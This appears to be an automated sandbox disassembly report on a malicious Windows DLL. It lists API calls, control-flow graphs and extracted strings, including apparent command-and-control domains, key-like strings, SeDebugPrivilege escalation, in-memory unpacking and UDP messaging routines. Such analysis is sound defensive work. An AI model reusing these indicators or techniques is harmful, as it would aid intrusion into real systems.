API calls 32752->32753 32755 1001e52c 32753->32755 32754->32752 32755->32728 32757 1000d5ad __EH_prolog 32756->32757 32758 10009203 ___DllMainCRTStartup RaiseException 32757->32758 32759 1000d66d 32758->32759 32760 10033888 std::_Facet_Register 69 API calls 32759->32760 32761 1000d68c 32760->32761 32762 1000d696 32761->32762 32852 1003245c RaiseException std::exception::exception __CxxThrowException@8 32761->32852 32841 1000ce76 32762->32841 32766 10033888 std::_Facet_Register 69 API calls 32767 1000d702 32766->32767 32769 1000d70f __gmtime64_s 32767->32769 32849 1001fe00 32767->32849 32770 1001c213 ___DllMainCRTStartup 70 API calls 32769->32770 32771 1000d747 32770->32771 32772 10032fed _sprintf 104 API calls 32771->32772 32773 1000d769 32772->32773 32774 10003078 ___DllMainCRTStartup 69 API calls 32773->32774 32775 1000d78a 32774->32775 32776 10002f31 ___DllMainCRTStartup 69 API calls 32775->32776 32777 1000d79d Mailbox 32776->32777 32778 10001898 ___DllMainCRTStartup 104 API calls 32777->32778 32779 1000d7b5 32778->32779 32780 10001d63 numpunct 69 API calls 32779->32780 32781 1000d7be CreateMutexA 32780->32781 32782 10034410 __time64 GetSystemTimeAsFileTime 32781->32782 32783 1000d80e Mailbox ___DllMainCRTStartup 32782->32783 32783->32726 32786 10025ebe 32785->32786 32787 10025e4e GetNativeSystemInfo 32785->32787 32786->32735 32788 10025ea0 32787->32788 32789 10025e78 GetNativeSystemInfo 32787->32789 32788->32735 32789->32735 32791 1001f814 32790->32791 32792 1001ebe4 32790->32792 32793 10033984 _free 68 API calls 32791->32793 32794 1001f8e0 CreateSemaphoreA CreateSemaphoreA 32792->32794 32793->32792 32799 100203b0 32794->32799 32798 1001ebfe 32798->32743 32798->32744 32816 10020540 32799->32816 32803 1001f999 32804 10020260 32803->32804 32805 1002026c 32804->32805 32814 10020287 32804->32814 32835 100204d0 69 API calls 32805->32835 32807 10020277 32809 10033984 _free 68 API calls 32807->32809 32808 100339bc _malloc 68 API calls 32810 100202de 32808->32810 32811 1002027f 32809->32811 32812 100339bc _malloc 68 API calls 32810->32812 32813 10033984 _free 68 API calls 32811->32813 32815 100202eb __gmtime64_s 32812->32815 32813->32814 32814->32808 32814->32815 32815->32798 32817 10033888 std::_Facet_Register 69 API calls 32816->32817 32818 1002054a 32817->32818 32820 100203f1 32818->32820 32832 1003245c RaiseException std::exception::exception __CxxThrowException@8 32818->32832 32822 10020580 32820->32822 32823 100205aa 32822->32823 32831 10020611 32822->32831 32824 10020777 32823->32824 32827 100205d5 32823->32827 32823->32831 32833 1003248d 69 API calls 2 library calls 32824->32833 32826 10020604 32826->32831 32834 1003245c RaiseException std::exception::exception __CxxThrowException@8 32826->32834 32827->32826 32830 10033888 std::_Facet_Register 69 API calls 32827->32830 32827->32831 32830->32826 32831->32803 32835->32807 32837 1001f534 32836->32837 32839 1001e49a 32836->32839 32838 10033984 _free 68 API calls 32837->32838 32838->32839 32840 1001f600 71 API calls 32839->32840 32840->32751 32842 1000ce80 __gmtime64_s __EH_prolog numpunct 32841->32842 32843 10001f26 numpunct 69 API calls 32842->32843 32844 1000cf37 numpunct 32843->32844 32845 10001f26 numpunct 69 API calls 32844->32845 32846 1000cf4c numpunct 32845->32846 32847 10001f26 numpunct 69 API calls 32846->32847 32848 1000cf61 32847->32848 32848->32766 32853 1001f140 32849->32853 32851 1001fe42 32851->32769 32854 1001f1b2 GetNativeSystemInfo 32853->32854 32855 1001f1d6 32853->32855 32854->32855 32856 1001f4d0 69 API calls 32855->32856 32857 1001f266 InitializeCriticalSectionAndSpinCount CreateEventA CreateEventA 32856->32857 32857->32851

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 987 1001d6d7-1001d700 988 1001d903-1001d919 987->988 989 1001d706-1001d719 socket 987->989 990 1001d726-1001d7bf htons htonl htons setsockopt * 3 bind 989->990 991 1001d71b-1001d721 WSAGetLastError 989->991 990->991 992 1001d7c5-1001d83a call 10039700 call 10002d15 call 1000191f call 10003256 call 10002d15 call 1000191f call 10003256 990->992 991->988 1007 1001d8f1-1001d8fe call 10001d92 * 2 992->1007 1008 1001d840-1001d845 992->1008 1007->988 1010 1001d847-1001d873 call 10039700 recvfrom 1008->1010 1015 1001d875-1001d87b WSAGetLastError 1010->1015 1016 1001d87d-1001d895 inet_ntoa 1010->1016 1017 1001d8e8-1001d8eb 1015->1017 1018 1001d899-1001d89d 1016->1018 1017->1007 1017->1010 1019 1001d8b9-1001d8bb 1018->1019 1020 1001d89f-1001d8a1 1018->1020 1023 1001d8be-1001d8c0 1019->1023 1021 1001d8a3-1001d8a9 1020->1021 1022 1001d8b5-1001d8b7 1020->1022 1021->1019 1024 1001d8ab-1001d8b3 1021->1024 1022->1023 1023->1017 1025 1001d8c2-1001d8e2 sendto 1023->1025 1024->1018 1024->1022 1025->1017
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001D70D
                                                      • WSAGetLastError.WS2_32 ref: 1001D71B
                                                      • htons.WS2_32(?), ref: 1001D736
                                                      • htonl.WS2_32(00000000), ref: 1001D73F
                                                      • htons.WS2_32(?), ref: 1001D753
                                                      • setsockopt.WS2_32(?,0000FFFF,00000020,?), ref: 1001D77C
                                                      • setsockopt.WS2_32(?,0000FFFF,00001005,?,00000004), ref: 1001D796
                                                      • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 1001D7A8
                                                      • bind.WS2_32(?,?,00000010), ref: 1001D7B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: setsockopt$htons$ErrorLastbindhtonlsocket
                                                      • String ID: req$res
                                                      • API String ID: 3993217638-3551752921
                                                      • Opcode ID: 3d766b1c86af322e2b1c674f8abb068208c2ba73b05bfcc30b4838f339cebc76
                                                      • Instruction ID: 1bc47685fa1208dc3a93f9195926757f6b3397a19b8973d8ec54e6f16cbb67a6
                                                      • Opcode Fuzzy Hash: 3d766b1c86af322e2b1c674f8abb068208c2ba73b05bfcc30b4838f339cebc76
                                                      • Instruction Fuzzy Hash: 9961A0B1408745AFE300EF64CC81AABBBECFF85354F40491AF69586190D771ED58CB92

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1502 1001d145-1001d16e 1503 1001d371-1001d387 1502->1503 1504 1001d174-1001d195 call 10039700 1502->1504 1507 1001d354-1001d358 1504->1507 1508 1001d19a-1001d1d2 call 10039700 recvfrom 1507->1508 1509 1001d35e-1001d362 1507->1509 1513 1001d1d4-1001d1da WSAGetLastError 1508->1513 1514 1001d1df-1001d1f5 call 10039ac8 1508->1514 1509->1503 1510 1001d364-1001d36d closesocket 1509->1510 1510->1503 1513->1507 1514->1509 1517 1001d1fb-1001d238 call 10002d15 call 1000191f call 10003256 1514->1517 1524 1001d23c-1001d240 1517->1524 1525 1001d242-1001d244 1524->1525 1526 1001d25c-1001d25e 1524->1526 1527 1001d246-1001d24c 1525->1527 1528 1001d258-1001d25a 1525->1528 1529 1001d261-1001d263 1526->1529 1527->1526 1530 1001d24e-1001d256 1527->1530 1528->1529 1531 1001d285-1001d287 1529->1531 1532 1001d265-1001d269 1529->1532 1530->1524 1530->1528 1535 1001d343-1001d34f call 10001d92 1531->1535 1536 1001d28d-1001d2be call 10039700 call 1001e307 1531->1536 1533 1001d26b 1532->1533 1534 1001d26d-1001d280 call 1000191e 1532->1534 1533->1534 1534->1535 1535->1507 1544 1001d2c1-1001d2c6 1536->1544 1544->1544 1545 1001d2c8-1001d307 sendto inet_ntoa call 10001d63 1544->1545 1548 1001d320-1001d322 1545->1548 1549 1001d309-1001d30b 1545->1549 1550 1001d324-1001d333 1548->1550 1551 1001d33a-1001d33e call 10001d92 1548->1551 1549->1551 1552 1001d30d-1001d31e 1549->1552 1553 1001d335 call 10006376 1550->1553 1551->1535 1552->1553 1553->1551
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001D1C7
                                                      • WSAGetLastError.WS2_32 ref: 1001D1D4
                                                      • closesocket.WS2_32(000000FF), ref: 1001D367
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastclosesocketrecvfrom
                                                      • String ID: bck$cc1
                                                      • API String ID: 3381545151-2601045076
                                                      • Opcode ID: 1afc6b33aa698e647960936aa7a38b170ccdc6ad95890d1043ae2c2f79c50c1a
                                                      • Instruction ID: 74b77c914f8fb08b1b481ee05821763d154c8954b077fc1ebe75881fb8d60909
                                                      • Opcode Fuzzy Hash: 1afc6b33aa698e647960936aa7a38b170ccdc6ad95890d1043ae2c2f79c50c1a
                                                      • Instruction Fuzzy Hash: 5C51D372508341AFE710EF60CC81BABB7E8EF45354F404A1EFAA587191D771EA48CB52
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000614B
                                                      • CreateThread.KERNEL32(00000000,00000000,1001D91A,?,00000000,00000000), ref: 100062EE
                                                        • Part of subcall function 1001E124: TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
                                                        • Part of subcall function 1001E124: CloseHandle.KERNEL32(?), ref: 1001E146
                                                        • Part of subcall function 1001E124: CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159
                                                        • Part of subcall function 1001DF0D: gethostname.WS2_32(?,00000100), ref: 1001DF22
                                                      • __time64.LIBCMT ref: 100061B8
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                        • Part of subcall function 10008C40: __EH_prolog.LIBCMT ref: 10008C45
                                                        • Part of subcall function 1001E0D0: TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
                                                        • Part of subcall function 1001E0D0: CloseHandle.KERNEL32(?), ref: 1001E0FE
                                                        • Part of subcall function 1001E0D0: CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,00000000), ref: 100061DE
                                                      • __time64.LIBCMT ref: 100061F4
                                                      • Sleep.KERNELBASE(1005AFD4), ref: 10006224
                                                      • __time64.LIBCMT ref: 1000622B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$Create__time64$CloseH_prologHandleSleepTerminateTime$FileSystem__aulldivgethostname
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 1676007256-3771769585
                                                      • Opcode ID: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
                                                      • Instruction ID: edc6faf32b4ddbc48c22d14bf9bbfd6284b9bbf4270abf8aa5e2a7a96d60cd1e
                                                      • Opcode Fuzzy Hash: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
                                                      • Instruction Fuzzy Hash: 7651C2759006419FEB14DF74C888ADE77E6FF08384F248479E95ADB14BDB34A984CB60
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001DFE9
                                                      • WSAGetLastError.WS2_32 ref: 1001DFF7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastsocket
                                                      • String ID:
                                                      • API String ID: 1120909799-0
                                                      • Opcode ID: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
                                                      • Instruction ID: 715bde583ba2571ee879b219f8558a55a2540612a220d1531e37932013ff7162
                                                      • Opcode Fuzzy Hash: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
                                                      • Instruction Fuzzy Hash: 0D21B730640759BFE7219B648C8AFAEBBB8EF48B10F104225F715AA1E0D7F09985DB51
                                                      APIs
                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209
                                                      • GlobalAlloc.KERNEL32(00000040,00000001,?,?,00000001,10011CC0,?,?,00000000,00000001), ref: 10002221
                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002236
                                                      • inet_addr.WS2_32(000001B0), ref: 1000225D
                                                      • inet_addr.WS2_32(000001D8), ref: 1000228F
                                                      • SendARP.IPHLPAPI(00000000,00000000,00000000,?), ref: 100022A5
                                                      • GlobalFree.KERNEL32(00000000), ref: 100022B7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AdaptersGlobalInfoinet_addr$AllocFreeSend
                                                      • String ID:
                                                      • API String ID: 3182797412-0
                                                      • Opcode ID: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
                                                      • Instruction ID: 66c9d7adb0e976905d06d262638f06281183517b136eb4124925cbb498e8f50e
                                                      • Opcode Fuzzy Hash: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
                                                      • Instruction Fuzzy Hash: 38214175900616BBEB01DBF4CC48AAEBBF8FF05394F114156E905D3254E730DA41CBA0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 3038321057-2896544425
                                                      • Opcode ID: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
                                                      • Instruction ID: 79d661b54e262ca987bee1b9e957b190e0284badbbec8ecc12dccea534644da2
                                                      • Opcode Fuzzy Hash: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
                                                      • Instruction Fuzzy Hash: 2301A871A00229ABEB10DFA5CC59EEFBFBCEF04744F444055E515E6190E7709A44DBA1
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 00B10487
                                                      • LoadLibraryA.KERNELBASE(?), ref: 00B10574
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00B1072B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000003.2037787029.0000000000B10000.00000020.00000400.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_3_b10000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Virtual$AllocLibraryLoadProtect
                                                      • String ID:
                                                      • API String ID: 1403325721-0
                                                      • Opcode ID: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
                                                      • Instruction ID: 7651bd41564716c4a7cf3f7b71bda43f624433c465c608722b19d56fe0899a2a
                                                      • Opcode Fuzzy Hash: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
                                                      • Instruction Fuzzy Hash: BB0239706183019FC715DF19C490A6ABBE5FF98714F4589ADE8899B391D7B0EC80CF92

                                                      Control-flow Graph

                                                      APIs
                                                      • WSAStartup.WS2_32(00000202,?), ref: 10005C19
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 10005CB7
                                                      • _sprintf.LIBCMT ref: 10005D14
                                                      • CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,?), ref: 10005D90
                                                      • _sprintf.LIBCMT ref: 10005DE0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateMutex_sprintf$Startup
                                                      • String ID: %s%s$331.$331.$5566$5566$611.$a2b.sh3y.com$agi.vh748yy.com$api.$api.$api.5566331.com$api.5566331.com$c1werjkdi%42&!#012$c1werjkdi%42&!#456$c1werjkdi%42&!#789$com$com$live$p.61$tki.bb5483b.com$wktc$wktcp.61611.live
                                                      • API String ID: 2582006962-90602932
                                                      • Opcode ID: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
                                                      • Instruction ID: 58b0ecb6076ab785b7a927ea96f25bffcb0b9f035f233e99f1965f63245a51b2
                                                      • Opcode Fuzzy Hash: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
                                                      • Instruction Fuzzy Hash: C5D17FB440C780AEE325DF60CC81FEBB7E8EB95344F44492DF19D46182DB75A549CBA2
                                                      APIs
                                                      • ___createFile.LIBCMT ref: 1004BCF9
                                                      • ___createFile.LIBCMT ref: 1004BD3A
                                                      • GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD63
                                                      • __dosmaperr.LIBCMT ref: 1004BD6A
                                                      • GetFileType.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BD7D
                                                      • GetLastError.KERNEL32(?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDA0
                                                      • __dosmaperr.LIBCMT ref: 1004BDA9
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004BDB2
                                                      • __set_osfhnd.LIBCMT ref: 1004BDE2
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BE4C
                                                      • __close_nolock.LIBCMT ref: 1004BE72
                                                      • __chsize_nolock.LIBCMT ref: 1004BEA2
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BEB4
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BFAC
                                                      • __lseeki64_nolock.LIBCMT ref: 1004BFC1
                                                      • __close_nolock.LIBCMT ref: 1004C021
                                                        • Part of subcall function 100411E8: CloseHandle.KERNEL32(00000000,1000DD8F,00000000,?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041238
                                                        • Part of subcall function 100411E8: GetLastError.KERNEL32(?,1004BE77,1000DD8F,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 10041242
                                                        • Part of subcall function 100411E8: __free_osfhnd.LIBCMT ref: 1004124F
                                                        • Part of subcall function 100411E8: __dosmaperr.LIBCMT ref: 10041271
                                                        • Part of subcall function 10037F1F: __getptd_noexit.LIBCMT ref: 10037F1F
                                                      • __lseeki64_nolock.LIBCMT ref: 1004C043
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C178
                                                      • ___createFile.LIBCMT ref: 1004C197
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1000DD8F,00000000,00000109), ref: 1004C1A4
                                                      • __dosmaperr.LIBCMT ref: 1004C1AB
                                                      • __free_osfhnd.LIBCMT ref: 1004C1CB
                                                      • __invoke_watson.LIBCMT ref: 1004C1F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd
                                                      • String ID: @
                                                      • API String ID: 710831883-2766056989
                                                      • Opcode ID: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
                                                      • Instruction ID: 4bc8964a9d16cae8c67520329504f5e8b6c1dd015f7f366feaadc10eed736cac
                                                      • Opcode Fuzzy Hash: 028b6c621d31f86aeed636b2d8108958d88111f8461befb549e19608a8c9b239
                                                      • Instruction Fuzzy Hash: 5A220471D00A0A9FEB55CF68CC91BAD7BA1EB04390F344279E911EB2E2C7759D40C799

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 327 1001a36c-1001a394 328 1001a396-1001a39d 327->328 329 1001a3f9 327->329 330 1001a3a1-1001a3ae call 1001a0f8 328->330 331 1001a39f 328->331 332 1001a3fb-1001a40c 329->332 330->329 335 1001a3b0-1001a3ee htons socket 330->335 331->330 336 1001a3f0-1001a3f6 WSAGetLastError 335->336 337 1001a40d-1001a42c setsockopt 335->337 336->329 338 1001a430-1001a450 inet_ntoa call 10001d63 337->338 341 1001a452-1001a46b call 100359ab 338->341 342 1001a46e-1001a477 338->342 341->342 344 1001a484-1001a4b3 call 1000191e connect 342->344 345 1001a479-1001a47f call 10001e92 342->345 350 1001a4b9-1001a4bf 344->350 351 1001a60a-1001a610 call 10001d92 344->351 345->344 353 1001a4c5-1001a4fe call 10016caa 350->353 354 1001a59f-1001a5a2 350->354 355 1001a615-1001a617 351->355 364 1001a500-1001a503 353->364 365 1001a505 353->365 356 1001a5a4-1001a5b3 inet_addr 354->356 357 1001a5b7-1001a5ba 354->357 355->332 356->357 359 1001a5bc-1001a5cb inet_addr 357->359 360 1001a5cf-1001a5d2 357->360 359->360 362 1001a5d4-1001a5df inet_addr 360->362 363 1001a5e7-1001a602 call 10001d92 360->363 367 1001a5e3 362->367 363->338 372 1001a608 363->372 366 1001a508-1001a530 inet_addr call 10016d1b 364->366 365->366 373 1001a532-1001a54b 366->373 374 1001a57a-1001a57f 366->374 367->363 372->355 373->374 375 1001a54d-1001a551 373->375 376 1001a581-1001a58a call 10033cf2 374->376 377 1001a58b-1001a59d call 10009277 * 2 374->377 379 1001a553-1001a555 375->379 380 1001a557 375->380 376->377 377->367 383 1001a559-1001a56b call 1000191e 379->383 380->383 389 1001a56d 383->389 390 1001a56f-1001a576 inet_addr 383->390 389->390 390->374
